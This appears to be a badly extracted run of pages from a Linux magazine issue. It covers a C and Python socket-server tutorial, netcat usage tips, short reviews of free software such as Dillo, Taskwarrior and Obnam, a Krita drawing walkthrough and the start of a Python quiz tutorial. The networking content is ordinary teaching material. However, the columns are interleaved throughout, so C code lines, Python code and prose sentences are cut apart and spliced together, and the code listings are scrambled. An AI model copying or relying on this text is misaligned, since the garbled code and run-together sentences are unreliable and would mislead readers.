20 You can turn our iterative “upper case” server into the one remaining Telnet client. The other two are
21 /* ---- Main program ---- */ a concurrent server by forking a new child process the children that were servicing the now-closed
22 to deal with each client. Because child processes Telnet sessions. Unfortunately, because their
23 void main() inherit file descriptors from their parents, this is parent isn’t waiting for them they have entered
rather easy. The schema looks like this: the zombie state. (We discussed the formation of
24 {
#include <signal.h> zombies in detail in LV004.) If you kill the original
25 int sock, fd, client_len; #include <stdlib.h> parent (just type ^C in the window where you
26 struct sockaddr_in server, client; .... started it) the zombies will disappear. But this isn’t
27 while(1) { a satisfactory situation, because for a long-lived
28 sock = socket(AF_INET, SOCK_STREAM, 0); fd = accept( ... ); server those zombies will eventually fill up the
if (fork() == 0) { process table. Fortunately they’re easy to prevent.
29 server.sin_family = AF_INET;
service(fd, fd); /* Child */ Just add the line:
30 server.sin_addr.s_addr = htonl(INADDR_ANY); exit(0); signal(SIGCHLD, SIG_IGN);
31 server.sin_port = htons(SERVER_PORT); } in main(), before the while loop. This will stop the
32 bind(sock, (struct sockaddr *)&server, else { zombies. You’ll also need an extra header file:
sizeof(server)); close(fd); /* Parent */ #include <signal.h>
} You can download the completed code for the
To test, compile the program and run it as concurrent server from the issue landing page on
34 listen(sock, 5); before. Then open three or so terminal windows
35 while (1) { and conduct a Telnet session with the server in There’s another way to write a concurrent
36 client_len = sizeof(client); each of them, like we did before. Convince yourself server, without using child processes, and that’s to
37 fd = accept(sock, (struct sockaddr *)&client, that you are conducting a separate conversation use the select() call. But the details are messy, and
with the server in each window. So far, so good. we won’t consider it further here.
Now quit out of a couple of those Telnet sessions When I first met concurrent servers, I didn’t
38 printf(“accepted connection on fd %d\n”, fd); (leave one open) and look at the process table: understand how it was possible to maintain
39 service(fd, fd); $ ps -e | grep ucc multiple client connections on the server, when
40 close(fd); 11760 pts/4 00:00:00 ucconcurrent they’re all using the same port. The answer is that
41 } 11837 pts/4 00:00:00 ucconcurrent the TCP connection is really defined by four items:
11839 pts/4 00:00:00 ucconcurrent <defunct> the port number and IP address of the server,
42 }
11858 pts/4 00:00:00 ucconcurrent <defunct> and the port number and IP address of the client.
I’ll not trouble you with the details of all the Here, process 11760 is the original parent Provided at least one of these four is different, it’s
data structures; some of them (like the process and 11837 is a child that’s connected to a different connection!
sockaddr_in structure) look more
client that connects and would eventually
run out. Then we simply loop back and await “Once they are connected, the client and server are
the next client. really just ‘peers’, and the application protocol will
The service() function at lines 9–19 is
really just symbolic of providing a real, useful determine the exchange from then on.”
service. The key points to note are that we
read a request from the client using the #!/usr/bin/python connection-oriented transport on top of an
descriptor returned by the accept(), and from socket import * unreliable connectionless one (IP). But there
write a response using the same descriptor. s = socket(AF_INET, SOCK_STREAM) are some things TCP doesn’t do. For one
Also notice the loop control at line 13. Each s.connect((‘localhost’, 1067)) thing, it doesn’t preserve message
read() will block until the client sends s.send(‘Hello World’) boundaries. If a client opens a connection
another request; when the client eventually reply = s.recv(1000) and writes, say, 300 bytes then 50 bytes
closes the connection this read will return 0, print reply then 100 bytes down the connection, the
and the loop terminates. Just as in the server we begin by creating server will simply find that it has 450 bytes
The accept() call on line 37 also returns a a stream (TCP) socket using the ‘INET’ waiting to be read. Usually, it’s left to the
sockaddr_in structure (called ‘client’ in the address family. Then, we actively connect to application protocol to make it clear where
code) that contains (among other things) the server at port 1067. Once the socket is the message boundaries lie.
the IP address of the client end of the connected, we can send a request to it, and
connection. We don’t use it in this example, read the reply. We see here the key It’s a privilege
but many real-world servers use this distinction between the client and the server: There’s an important rule in the Linux world
information for logging or access control. the server passively listens for and accepts that says ports below 1024 are “privileged”
This is a simple iterative server – it talks connections; the client actively connects. -- that is, a program can only bind a
to just one client at a time and any other that Notice that we don’t explicitly bind a port privileged port if it’s running as root. This rule
try to connect in the meantime will have to number for the client; the system will bind goes back many years and probably
wait. The first five will have their connection an (arbitrary) port for it to use. Once they are seemed like a good idea at the time,
requests placed on the queue we created; connected, the client and server are really because in theory it prevents regular
any beyond that will have their connections just ‘peers’, and the application protocol will (non-root) users from masquerading as
refused. However, it is not difficult to turn determine the exchange from then on. bona-fide servers and capturing sensitive
this into a concurrent server. Typically the client transmits first (some sort login information.
of request) and the server returns a reply. Nowadays when many users have root
What about the client? For some services the server will transmit access to their PCs the rule makes very little
We can use a program such as nc (or even first, for example the old Daytime server on sense, and forces servers to run as root
Telnet) as a client to test our upper-case port 13 (which nobody runs any more) simply so that they can bind their well-
server, but for completeness’ sake let’s write works like that – you just connect to it and it known privileged port. A well-written server
a client program, too. I can’t bring myself to sends you a string. TCP is a wonderful will drop its user ID to a non-root account as
inflict more C on you, so this one’s in Python: protocol, providing the illusion of a reliable, soon as it’s got the port bound.
Command of the month: netcat
Netcat (also known as nc) has been Now we can browse to port 8080 and loop around it like this:
described as the Swiss Army knife of see the content. Of course, it’s not a real $ while true; do nc -l 8080 < somecontent.html; done
networking commands. You can use it to web server so we don’t get a proper HTTP Now here’s a challenge for you: I
create simple TCP or UDP clients or servers, response header back, but the browser attempted to use nc in conjunction with tr
and it’s designed to be easy to script around. doesn’t seem to mind. Also useful is the and a named pipe to cobble together an
We’ve already seen it in use as a client to standard output from nc, which shows us equivalent to the upper case server at the
test our upper case server. Because it acts the actual HTTP request from the browser command line. Following a very similar
as a filter, reading stdin and writing stdout (somewhat trimmed here): example in the man page, I tried:
like filters usually do, we can perform all the $ nc -l 8080 < greet2 $ mkfifo /tmp/f
usual tricks of redirecting the streams. Here, GET / HTTP/1.1 $ cat /tmp/f | tr ‘a-z’ ‘A-Z’ | nc -l localhost 1234 > /
we pass the contents of a local file greet to Host: localhost:8080 tmp/f
our server and capture the result in greet2: Connection: keep-alive ... then on the “client” side I ran:
$ nc < greet localhost 1067 > greet2 Cache-Control: max-age=0 $ nc localhost 1234
Using the -l (listen) option, you can also Accept: text/html,application/xhtml+xml I can enter text, but then the whole thing
cast nc in a server role. Here it is, being the User-Agent: Mozilla/5.0 hangs. If you can figure out why this doesn’t
world’s most boring web server, delivering Of course it’s a one-shot affair; nc will work (and especially if you can fix it) drop
the same file every time: terminate after serving the page once. But me a line at
$ nc -l 8080 < somecontent.html with a bit of shell scripting we can wrap a I’d be delighted to hear from you! 67
FOSSpicks Sparkling gems and new
releases from the world of
Free and Open Source Software
Mike Saunders has spent a decade mining the internet for free
software treasures. Here’s the result of his latest haul…
Lightweight web browser
Dillo 3.0.4
irefox, Chrome, Internet FLTK toolkit, so once you have the
Explorer, Safari… They’re all development packages for that
classed as “web browsers”, installed, you can build it with the
but a more apt description usual ./configure, make and sudo
nowadays would be “application make install routine.
platforms”. The amount of code
being pushed into browsers for Back to basics
things like 3D graphics, PDF Dillo doesn’t support a lot of web
rendering, video codec support and technologies – there’s no
other features is impressive (and JavaScript, for instance. That might
sometimes scary) – and we’re be a dealbreaker for some people,
increasingly running applications but we know that plenty of our
and games inside our browsers. readers use the NoScript extension
In some ways this is great, but to block random JavaScript from
what if you just want a stripped- being executed on their machines. There’s also a panel showing errors in a page – useful for
down web browser? You know, And many would argue that a site checking your HTML before you make it live.
something that renders HTML that doesn’t work unless JavaScript
pages and doesn’t try to support is enabled is broken by design – So while Dillo doesn’t work
everything including the kitchen sites should really adapt for older or everywhere, it still has the basics
sink? There are a few options here, more limited browsers. covered, and handles most HTML
and one of our favourites is the and CSS pretty well. If you do a lot
classic browser Dillo, which has just
seen a new release.
“If you do a lot of browsing on of browsing on text-heavy websites,
you’ll find it scorchingly fast – for
Dillo is designed to be slim and text-heavy websites, you’ll find instance, loading the Wikipedia
fast, with few dependencies; its
interface is built with the frill-free
Dillo scorchingly fast.” page for Linux on Dillo took less
than a second in our testing,
whereas Firefox took just over three
seconds before it finished rendering.
OK, so Firefox does a lot more,
but these time savings all add up
over an extensive browsing session.
And then there’s the memory
usage: Firefox required 148MB with
just that single Wikipedia article
open, whereas Dillo only snapped
up 20MB from the RAM banks.
Dillo is no challenger to the big
browsers, but we love it that there’s
a browser out there fully focused on
being light and fast, getting the
Dillo’s page rendering most out of older machines.
isn’t always perfect, but
boy is it fast, and great
for reviving old boxes.
Task management tool
Taskwarrior 2.3.0
ith your work, hobbies, called “Write FOSSpicks”. If you
family life and other then enter task list, you’ll see the
things, you probably newly created task – try adding a
have a sizeable to-do list as well. few more tasks with different dates
Installing a task management tool and priorities. When you enter task
could really help you to get on top list again you’ll see a number at the
of things – it makes all the start of each task; you can use
difference for us. Various programs these to perform operations on
exist, but we’re always happy when individual tasks, such as:
we find one that avoids fluffy GUI task 3 delete
front-ends and gets down to the
heart of the matter. Groundhog day
Taskwarrior is exactly that: it’s a To create a recurring task, specify
supremely configurable command- the date and how often it should
line program that focuses on happen like so:
managing your to-do list. Entries task add due:1st recur:monthly Stock up
Although it’s a CLI app,
can be supplemented with on beer the colour scheme looks rubbish,
Taskwarrior makes good
priorities, projects, due dates and This creates a task on the 1st of use of colour to present edit ~/.taskrc and uncomment one
recurrences (eg the task should be every month. Now, once you have information clearly and of the theme lines – light-16.theme
completed once a month). As it’s a your to-do list fully inputted, you’ll attractively. worked best for us.)
text-based program, its want a way to filter down certain As time goes on and you
dependencies are minimal; on our tasks. For instance, you can list only complete more and more of your
vanilla Ubuntu 13.10 test box we high-priority tasks like so: tasks, you can bring up some other
only had to install the uuid-dev task priority:H list useful views. The task burndown
package in order to follow the (Or try task next to put the most command displays a bar chart
instructions in the INSTALL file. important tasks first.) Another showing tasks you’ve started and
Once you have Taskwarrior useful command is task calendar, completed over the previous weeks,
installed, enter task alone – this will which shows an attractive coloured and you can change that to a daily
create a sample .taskrc file in your view of the next few months, with view with task burndown.daily.
home directory, along with a .task/ upcoming tasks marked in red. (If We’ve only just scratched the
data directory in the same place. To surface of Taskwarrior here: enter
get started:
task add priority:H due:2014-07-10 Write
“The ‘task burndown’ command man task to see the vast range of
options available.
FOSSpicks displays a bar chart showing tasks
Here, we’re adding a new task
with high priority, due on 10 July,
you’ve started and completed.” PROJECT WEBSITE
How it works: Adding tasks to projects
1 Create a project 2 Modify tasks 3 Filter tasks
To lump tasks together in projects, first create To add existing tasks to projects, use the To display tasks that belong to a single project,
a task with the project:Name option. If that project modify command. Here we’ve done task 1 modify use task list project:Name. task projects shows all
doesn’t yet exist in Taskwarrior, it will be created. project:LinuxVoice, then run task list. projects in Taskwarrior’s database. 69
Database-less blogging platform
FlatPress 1.0.2
ordPress isn’t the Next, the installer prompts you to
hardest thing in the create a login account, and then
world to install, but shows you the front page for your
sometimes you just want to set up brand-new blog. The default theme
a simple blog or CMS without the isn’t especially attractive and has
hassle of databases and related an early-2000s look to it – but there
bits and bobs. FlatPress is designed are many extra themes at http://
for exactly these situations: its,
authors brag that you can “forget some of which are superb.
about SQL”, because all you need is FlatPress’s admin area is where
a web server with PHP support. you add, modify and delete entries,
To install a new theme,
Extract the .tar.gz file into your and it also sports an impressive modify the layout of the blog (eg
just extract it in
document root, then access plugin system for adding things like fp-interface/themes/. where the search box and
http://localhost/flatpress/ in your BBCode markup, image thumbnails This is Deckay40. categories list go) by dragging and
browser, and you’re ready to go. and spam filtering for comments. dropping widgets – a surprisingly
Well, almost. FlatPress saves There’s no fancy WYSIWYG editor advanced feature for a lightweight
your blog entries as plain text files, for creating entries, just a few engine. And making a backup of the
so it needs to be able to write these buttons providing shortcuts for blog or moving it to another server
on the server. You’re required to various formatting options, so it’s is super-simple, thanks to the lack
make the fp-content directory not designed with complete of a database, as you can simply zip
writable by the user account for the newbies in mind. up or copy the directory.
web server, but that’s pretty much it Along with normal entries you
in terms of fiddling around at the can create static pages to appear in PROJECT WEBSITE
command line. the menu. Excellently, you can
Backup tool
Obnam 1.8
hat’s the single most that zero bytes are saved. How
important piece of come? Well, Obnam only saves
advice you can give to chunks of data that have changed
new computer users? “Nigerian – so it doesn’t waste space by
princes are not going to send you copying every file in each backup. If
$500,000” might come top of the you make a daily backup of your
list. Apart from that, the answer is: data but don’t add or change many
make backups. files over a month, the backup
The highlighted section
Obnam is a great command line repository won’t be much bigger that you’ve backed up, then enter
shows generations of
tool for making backups, and has a than the original. To restore a file: backups, and “latest” is mkir tmp
few nifty tricks up its sleeve. It’s obnam restore --to /restore/to/here /path/ always symlinked to the obnam mount --to tmp
easy to build from source, or if to/restore newest one. Now go into tmp and you’ll see
you’re running a .deb-based distro, The repository where Obnam numbered directories: these are
you can add a repository to get it stores its backups isn’t meant to be different generations of backups.
with a quick apt-get. Making a human readable. But you can look Obnam has commands for
backup is as simple as this: at generations of backups using the removing old generations, leaving,
obnam backup -r /path/to/backups /dir/to/ FUSE userspace filesystem driver. for instance, one per week for the
save Use cd to switch into the directory last year behind. It can also back up
Here, Obnam generates a data data via SFTP and supports
repository in /path/to/backups,
saving the contents of /dir/to/save.
“Obnam only changes chunks of encryption via GnuPG.
If you run the above command data that have changed.” PROJECT WEBSITE
once again, you’ll see in the output
Text editor
NE 2.5
oes the world really need for online help, tap Esc twice. You’ll
another text editor? We see that the menus are chock full of
have Vim, Emacs, Nano, features and options, and many of
Gedit, Kate, Sublime Text, Joe and them have associated keybindings
countless others, covering virtually that you can learn for faster editing
every type of user on the planet. over time.
Where NE excels, however, is in NE comes equipped with a
combining high-end features with boatload of features: syntax
newbie-friendly keybindings and highlighting for 46 languages; a
menus. It has the approachability of macro/scripting system for
Nano but with much more recording and playing back editing
NE’s learning curve is
functionality behind it. Another goal actions; unlimited undo/redo; much more gradual than In all, NE is a mightily impressive
of NE is to be small and highly search and replace with regular Vim’s or Emacs’s, but it editor. As decade-long Linux geeks
portable, so it will run on almost expressions; UTF-8 support; and a still has oodles of useful we always recommend mastering
every Unix/POSIX-like system simple visual file browser. One features. Vim or Emacs, but we understand
(although to be fair, Vi already has particularly useful addition for that some people simply don’t get
that claim to fame). programmers is bracket matching, along with the modal editing or key
When you first launch NE, you’ll so you can see if you’ve properly combinations of those editors. So
see a status line along the bottom closed a block of code. NE has become our number 3
with information about the current recommendation now - let us know
file (line and column count, filename if you become a fan!
and so forth). Hit F1 to bring up the “NE combines high-end features
menu – or if your window manager
or terminal emulator intercepts F1
with newbie-friendly keybindings.” PROJECT WEBSITE
Free Flash Player alternative
Lightspark 0.7.2
icture this: it’s the late bug-infested binary blob. But many
2000s. You’re Adobe. Your sites still use Flash, and Lightspark
Flash Player is installed on is an open source player and
almost every computer around the browser plugin that aims to provide
world, and provides a fairly light and a replacement for Adobe’s program.
unintrusive way for people to watch To compile it you’ll need LLVM/
videos and play games in their Clang – or if you’re on an Ubuntu-
browsers. The HTML5 features that based distro, a PPA is available.
will supersede Flash are a long way
off, and you enjoy a very strong Free the kittens!
Want to jump to a later
position. That was a long time ago. The main focus for Lightspark is combination with the pause button.
part of the video?
Adobe bloated the player to the YouTube compatibility, and it works Thumbnails of scenes We tried Lightspark with various
extreme – it became increasingly fairly well there. We had to edit /etc/ appear, but moving Flash games and it didn’t hold up
fat and buggy, crashing browsers xdg/lightspark.conf and change the around didn’t work well especially well. But in fairness, it’s
and generally being a nuisance. And audio backend from “pulseaudio” to in our testing. not at 1.0 yet, and if you want to
in a shockingly stupid move, Adobe “sdl” to get sound, but otherwise keep your Linux box pure FOSS but
decided to bundle McAfee nagware most videos played without any still enjoy the odd YouTube cat
with the program on Windows, so major glitches. The main problem compilation video, it bridges the
Flash became universally despised. we encountered was with jumping gap until all videos on that site are
Today, most features of Flash are around inside videos: trying to get HTML5-ready.
available in the HTML specs, so you to a later part of a long video was
can play games and watch many an exercise in frustration, only PROJECT WEBSITE
video formats without that ugly occasionally working in 71
CPU reporting tool
i7z 0.27.2
o you’ve just bought a shiny information about your CPU, and
new desktop or laptop with a then displays a constantly updating
high-end Intel Core i7 chip. screen. In this screen you’ll see
You’ve installed your favourite Linux general statistics for the processor
distro and are going about your (frequency, number of cores,
usual business. Everything is faster whether Hyper-Threading is
than your old box, that’s for sure enabled etc.), and then for each
– but don’t you want to coo over core, the actual frequency at this
your snazzy new processor a bit very moment.
more? Just admire its You can also see how much time
awesomeness without doing (as a percentage) each core spends
i7z provides short but
anything specifically productive? in the various Cx power saving writes the data to a file. This can be
handy descriptions of
i7z is a CPU reporting tool for states, along with temperature the Cx power saving useful for performing diagnostics
these chips, although it also works information. Unlike top, there’s states along the bottom. over a longer period of time.
with i3 and i5 processors. While it’s nothing in the way of interactivity It’s also worth noting that the
not especially difficult to compile here – the only key combo that source code includes a Qt-based
from source code, the developers does anything is Ctrl+C to exit. GUI front end for i7z, but the
have made 32-bit and 64-bit static Along with the full-screen mode, developers stress that the code is
binaries available on the project’s there’s also a logging option, which suffering from bit-rot now and it’s
website, which work without any lacking many features of the
hitches (providing you don’t mind command-line version.
running pre-compiled binaries). “i7z is a CPU reporting tool for
To get the most out of i7z, run it
as root; it gathers various bits of
Intel’s high-end Core i7 chips.” PROJECT WEBSITE
Bandwidth monitor
Bmon 3.3
s part of the everyday packages installed; then run
tabs-keeping of an average ./, ./configure and
system administrator (or make. If it compiles successfully,
even just a regular user with more run make install as root, and finally
than one machine running), you bmon to start the program.
may have applications chugging
away to monitor your disk space Network information
and CPU usage. Perhaps they’re in Along the top you’ll see a list of
a corner of the screen, so you can network interfaces, while the middle
flick your eyes up and check that panel is where all the action takes
the server isn’t being overloaded. place: the auto-updating bar charts
Bmon updates its graphs
If you want to do the same thing (RX = received data, TX = packets and IPv6 statistics. One
every second by default,
for network bandwidth – eg you’ve transmitted). Try doing something but you can change that feature we’d like to see, though, is a
put a new web server online and bandwidth-intensive on the with a CLI option. warning system: it’d be great if the
want to make sure it’s not getting machine, and you’ll see the charts tool could colour the bar charts in
overstretched – then Bmon is a update accordingly. This alone is red if the bandwidth exceeds a
great solution. It shows bandwidth useful enough, making load spikes certain value over a certain period
consumption at a glance, easy to spot, but if you stretch out of time, for instance. Time to get
generating simple ASCII graphs the terminal window to provide cracking on a patch then…
that are updated in real time. plenty of space and hit the D key,
To install it on a Debian/ you’ll see lots of additional info.
Ubuntu-based distro you’ll need the This is useful for diagnostics,
libnl-3-dev and libnl-route-3-dev showing things like dropped
FOSSPICKS Brain Relaxers
Physics-happy motobike sim
XMoto 0.5.11
Moto is one of our brake, while the left and right keys
favourite open source shift the rider’s weight on the bike,
games of all time, partly causing him to lean forward or
because it brings back some back. This also lets you perform
fond memories of playing rotations in the air, if you have the
Kickstart 2 on the Speccy, but guts to do it…
also because it’s simply damn By far the best part of XMoto is
good. At its heart, XMoto is a its raft of online features. The game
side-scrolling racing game where can download hundreds of
your objective is to reach the goal player-created levels from the net,
in the quickest time possible – and then you can try to beat the
The light blue rider is the
nothing special there. best times. But you’re not just wacky manoeuvres. It’s all superb
“ghost” from the previous
Where this game is special, racing against the clock: there’s a record holder - seems a fun, though, and the vast range of
though, is in its physics. Keeping translucent “ghost” rider showing dangerous stunt he’s courses to play on will keep you
your balance is tricky business, how the record holder completed pulling off though... entertained for ages. You can
especially when you have ramps, the track, so you can compare your even create your own levels using
slopes and other obstacles to riding skills with it and end up with Inkscape – a great use of
deal with, and trying to land some nail-bitingly close finishes. another top-quality open source/
properly off a big jump, when Some of the levels reward Free Software application.
you’re spinning through the air, is general racing skills, whereas
tough. The up and down cursor others are downright crazy and PROJECT WEBSITE
keys are used to accelerate and require you to perform all manner of
Sliding block puzzle
n2048 0.1
asy to play, yet endlessly thing you need to compile is is the
addictive. Tetris is perhaps libncurses5-dev package (under
the best puzzle game in Debian and Ubuntu; other distros
history, but a few others have will have similarly named
popped up over the years, and at packages). Extract the tarball, enter
the moment a game called 2048 make, and then run the game in
is all the rage. It’s incredibly easy place with ./n2048.
to pick up: you slide numbered Although the README.txt file
tiles on a grid to combine says that you can use the arrow
matching ones, the goal being to keys to slide tiles around, they didn’t
eventually create a tile with the work properly for us – but
As you combine
number 2048. Sounds easy? It fortunately you can also use the your coffee break, yet it’s
matching tiles to make
seems so at the start, but it gets WASD combination (as in a larger numbers, new tiles addictive enough to keep you
darn tough later on. first-person shooter), or even better, (starting with 2) appear coming back. It also has that
Anyway, although 2048 is free the HJKL keys in true Vi fashion. on the screen. Tetris effect where, after an
to play in a web browser (http:// There’s little in the way of fancy especially long bout of playing,, it graphics or effects here, but the use you start seeing tiles when you
didn’t take long for some open of colours for differing tile values close your eyes.
source clones to appear. n2048 makes the game easy on the eyes.
runs in a terminal using Ncurses n2048 is one of those games you PROJECT WEBSITE
for the interface – so the only can pick up for a quick session in 73
Email to advertise here
Dip your toe into a pool full of Linux knowledge with eight
tutorials lovingly crafted to expand your Linux consciousness
In this issue…
76 78 82
Ben Everard
is trying to pack up his hardware workbench in
preparation to move house.
Paint with Krita Build a quiz Run Tor
ssue 6 – wow! It’s hard to believe LV’s Artist in residence, Les Pounder builds a game Set up and maintain a
that Linux Voice is already half a Graham Morrison, swaps that shows off the power Tor node to help make a
year old, but so much has happened his brushes and pallet for of EasyGUI and the ifs and safe space on the internet
since the Indiegogo campaign. In that a computer and draws ands of Python conditional for anyone who needs it,
time, we’ve accomplished part of what famous geeks in Krita. statements. including Ben Everard.
we set out to: create a brilliant Linux
magazine. However, we also want to
help support the FLOSS ecosystem.
86 90 98
This is partly driven by self interest (the
more awesome free software is, the
more people will use it, and the more
people who use it, the more people who
will buy our magazine), and partly by a
desire to do the right thing.
Over the next six months, you’ll see
this plan really kick into action. We’re
Master packages Build a robot Edit eBooks
now only a few weeks away from issue Software comes in many Attack colleagues and Marco Fioretti introduces
1 being released under a Creative shapes and sizes. Keep your defend your desk in style. Sigil, a tool for crafting
Commons licence. Once that happens, programs in order with Mike Ben Everard’s face-tracking books in the ePub format
we hope that the Linux Voice content Saunders’ guide to package Nerf gun takes the effort that works with all sorts
will reach a much wider audience. The management. out of office warfare. of e-readers.
only thing we do know is that by
releasing it as Creative Commons, we’ll
enable people to build on it, update it, PROGRAMMING
and remix it in their own ways.
Following on from that will be the end Callbacks Olde Code
of our first year, and that’ll be when we 102 Computer programs don’t always run one line 104 Alan Turing is one of the most famous people
after the next. Sometimes you need certain in computing, but not all of his work is well
donate 50% of our profits to free
events to trigger certain code blocks, enabling you to known. The Manchester Baby, which Turing worked
software causes. We’re still hammering handle asynchronous input and output without tying on, explored the use of cathode ray memory where
out the details of exactly how we’ll do up the process while you wait for something to data was stored in a dot on a screen similar to those
this, but stay tuned and we’ll have more happen. Many programming languages allow you to on old CRT TVs. This innovation allowed more
information in the coming months. If use callbacks for this, but JavaScript makes it a information to be saved and paved the way for the
you know of a cause you’d like us to speciality. Node.js then brings this to the command better-known Manchester Mark I. Turing wrote one of
line to help you build powerful servers and even only three programs for the Manchester Baby – and
highlight drop me an email. hardware devices. you can test his code for yourself. 75
You don’t have to be an artist to create (almost) credible results from
this fantastic drawing application.
on’t worry, we’re not becoming a magazine
WHY DO THIS? about art or drawing. But during the course of
• Support an excellent writing this month’s FAQ on Krita (see page
free software project
38), we learnt quite a bit about how to work with this
• Unleash your inner artist
fantastic application. And we did this by attempting to
• Create your very own
Stallman portrait draw Richard Stallman without any prior artistic
knowledge and using just a mouse. We think this
highlights some of the excellent drawing modes and
tools in Krita, but most of all, the fun you can have
messing around for a few hours. You might even find
some artistic ability you never knew you had. Even if
We’re too scared of
you don’t, it certainly helps take your mind off
Stallman’s opinion to
programming and PulseAudio if things are getting a send this to him.
little stressful.
Step by step: Create with Krita
Create the canvas 2
Find your base image
We’re using Krita 2.8, which you should find in your We’re going to copy both the colour palette and the
distribution’s repository – either as a standalone overall image from a photo. We took ours from
application or as part of KDE’s Calligra suite. When Wikimedia – it was taken by NicoBZH and released
you first launch the application, a dialog appears under a Creative Commons licence. You need to
asking you to create a document. This is where you import your photo into a new layer. Krita’s layers are
need to define the resolution and aspect ratio of the identical to those you find in many art programs, and
end result, as well as the colour mode. they enable you to draw one layer on top of another
After clicking on Create, the main window will layer, or for layers to process another layer while
appear. The Docker panels that are attached to the allowing transparent areas to show through.
right-hand border can be moved and dropped onto Krita enables you to import an image as a new layer
one another, and enabled and disabled from the by selecting Layer > New > Import Layer. But after
Settings > Dockers window. Depending on the doing this, there will be a disparity between your
capabilities of your graphics hardware, we’d also image size and the size and resolution of your canvas.
highly recommend using OpenGL hardware To solve this, we need to scale the layer, and the
acceleration for the canvas. This can be enabled by easiest way to do this is using the Transform tool over
selecting Settings > Configure Krita, clicking on the on the left. With this selected you can Shift+drag one
Display page and the OpenGL box. This will speed up corner of the image to fill the largest area of your
nearly all drawing operations. canvas (holding Shift keeps the proportions intact).
Experiment with brush models 4
Add a background
We’re going to do our drawing on a layer above the With the sketch of the outlines created, we next
photo. Just click on the small ‘plus’ icon in the layer wanted to create a background to give the image
Docker to create one. You also need the default ‘white’ some context. This is very simple and it allows you to
layer between the photo and our new transparent mess around with the ‘wet’ brush models offered by
layer. Layers can be dragged and dropped to change Krita. These are great fun, because by changing the
their order, and you can switch between making them opacity levels, you can use the brush to paint colours PRO TIP
visible by clicking on the small ‘eye’ icon to the right of and to merge and blend colours. You’ll want to remember
the keyboard shortcuts for
a layer’s thumbnail. You should also change the To create the background, first switch to the photo changing the brush size
opacity of the ‘white’ layer so that you can see through and steal a colour from the background. Use the – [ and ], as well as the
this to the image below. You’re going to become very colour picker or press P, and select a colour before brush’s opacity, I and O, as
you use these all the time.
familiar with layer shuffling, visibility checking and switching back to a brush (press B). Bristles_wet is a
opacity changing, because you need to constantly good brush for this, and using this in broad strokes is
adjust the layer order for each section of the drawing. a good way of finding a style that works for you. You
The see-through opacity of the white layer creates should also get used to stealing colours from the
the digital equivalent to tracing paper, and our first photo and painting them back into the same
step is to create a sketch of Richard’s outline in the approximate locations, because that’s how we got the
transparent layer we just created. lighting and colours correct in our final image.
Use only handful of colours 6
Refine your masterpiece
With the background created, add a new transparent Adding the final detail is a great stress reliever – we
layer. We’re going to use this for the main body of our found ourselves tinkering around for hours, selecting
drawing. By picking colours from the photo, switching colours, using the colour palette to darken them, or
between layers and brushes, and by changing the experimenting with other colours. We also added a
opacity, you should now attempt broadly paint the light source to the background and added some of the
main blocks of colour into your image. You might colours from the background into the main image for
want to do this with the photo layer directly beneath added interest. The mixover_oil brush is perfect for
the new layer you created, at least initially. We found this, because it changes direction depending on where
the best brushes for this step to be the various the mouse is moving, adding colour in a way that feels
bristles modes and the mixover_dull brush. It’s also similar to oil painting. It also enables you to create thin
important to try to fill in some of the sketch lines with lines when moving in one direction, or a dapple effect
the colours of the shades on the photo. We quickly got for hair when clicking randomly.
used to picking new colours and merging them When you’ve finished, your exported image may
together and using 100% opacity for the edges with a need a little post processing, because the OpenGL
small brush. As you can see in the screenshots, we acceleration isn’t 100% accurate when it comes to
didn’t get too worried about fine detail as long as we colour reproduction. But we also found the PDF
got the thrust of the outline and colours correct. output to be excellent. 77
Les Pounder imports functions, defines variables and lists and
hones his quizzing skills – all in Python!
uizzes are great fun – whether it's a friendly
game of Trivial Pursuit at Christmas or a pub
• Program the lazy way, by quiz down at the Dog & Duck, they're great
re-using other peoples'
code in your projects. opportunities to show off your knowledge of trivia. In
• Use lists, variables and schools around the world, quizzes are used to test the
functions to control a learning of the students and to consolidate the
logic flow. learning experience.
• Display your vast Creating a quiz is a great way to learn more about
quizzing knowledge to
friends and family. structure and control of a program. When writing the
code you need to understand how the program will
flow: if the player answers the question correctly they
progress through the game, but incorrect answers Here's our finished quiz application, written in Python and
inhibit their progress. The use of programming logic with nice clickable buttons courtesy of EasyGUI.
enables the creator to set the pace and the rules for
the game while testing their own programming skills. When Idle first opens, it presents you with a shell
For our game we will create a quiz with Python- interface that looks very similar to the image bottom
related questions, and to enhance the game we are right. A shell is an environment where you can
going to add two libraries to our code: prototype new ideas and interact with running
EasyGUI is an easy way to create a graphical user programs. The shell is not an ideal environment to
interface (GUI) for our Python program. write a large program, as it normally works on a line by
Pygame is a library full of great tools that can line basis. If you wish to write much larger programs,
enable you to build games and multimedia content. which we do, then the best place to work is inside the
For our game we will use Pygame to add music and editor, and to use the editor all you need to do is go to
sound effects to our project. File > New to open a fresh blank editor window.
Setup Plan your logic
This project can be created using any computer, Let’s open our project in Idle, using the File > Open
including a Raspberry Pi. We're using Linux Mint 17, dialog to navigate to the location where you extracted
which is based on Ubuntu. We'll also need the Idle the project files, so open the file labelled
development environment, so to install each of the Once again we will illustrate the intended actions of
packages open a terminal and type in the following. the project via pseudo code, which is a tool to write
To install IDLE the flow of a program in plain English. Here is how we
sudo apt-get install idle envisage the program will flow.
To install EasyGUI 1 Intro asking the player if they would like to play
sudo apt-get install python-easygui the quiz
To install Pygame 2 If the player wishes to play
sudo apt-get install python-pygame 3 Reset the score to zero
Once these have been installed, you will need a 4 Tell the player their current score
copy of the project files from 5 Ask the first question
lesp/LinuxVoice_PythonQuiz. You can also download 6 If the player answers correctly
a Zip archive containing all of the project files from 7 Add 1 to their score 8 Play jingle
archive/ 9 Show a dialog box congratulating the player and
Idle is an easy-to-use Python editor with an their current score
uncluttered and minimalistic interface, enabling you 10 Else if the player answers incorrectly
concentrate on writing the code rather than being 11 Play jingle
distracted by fripperies. Idle comes in two versions, 12 Show a dialog box advising the player of a wrong
one covering 2.x and the 3.x series of Python. For this answer
tutorial I'm using the version for 2.x. 13 Repeat question twice more to allow player to
answer correctly
14 The question structure continues for three more
questions before moving on to the end sequence.
15 Play the intro music
16 if the players score is less than , show a dialog box
that commiserates the player and shows their final
17 Show a dialog box that congratulates the player and
shows their final score.
In order to better understand the project we’ll break
the code down into sections and step through each
section, so let's take a closer look at the code.
In Python you can easily add extra functionality to any
project via the use of libraries. Libraries come in all
shapes and sizes, from the simplest, time (which
enables you to import various time and date
capabilities into your program) to the most complex,
such as numpy and scipy which are used by NASA
(and which we used in LV003 to hunt for comets – common with Raspberry Pi-based projects, as the EasyGUI has an expansive
As with many other Python projects, we first have Python library RPi.GPIO is rather awkward to type and array of many different
